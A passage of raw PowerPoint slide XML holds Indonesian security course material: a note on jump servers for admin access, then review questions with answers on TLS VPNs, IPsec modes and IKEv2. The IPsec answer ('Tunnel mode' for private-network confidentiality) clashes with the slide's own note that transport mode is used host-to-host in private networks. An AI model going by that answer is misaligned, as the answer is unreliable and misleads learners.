            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada host di zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengkonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaudit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerumitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lompat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lompat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RDP. Administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lompat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lompat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> admin pada server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> admin server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ACL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lompat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host lain.</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123</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233744904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1. True or false? A TLS VPN can only provide access to web-based network resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>False.</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dirty="0"/>
              <a:t>TLS VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TLS VPN modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>tunnel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>trafik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> client-server apps, email, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> full network access (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mirip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IPsec VPN).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jadi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. What IPsec mode would you use for data confidentiality on a private network?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tunnel mode.</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b="1" dirty="0"/>
              <a:t>Tunnel mode:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (header + payload), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membungkusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> header IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway (site-to-site) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> client-to-gateway.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Transport mode:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> payload, header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host-to-host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>data confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di private network, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>tunnel mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyembunyikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. What is the main advantage of IKEv2 over IKEv1?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Faster re-establishment and mobility support.</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dirty="0"/>
              <a:t>IKEv2 (Internet Key Exchange v2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyederhanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>negosiasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibanding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IKEv1 → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
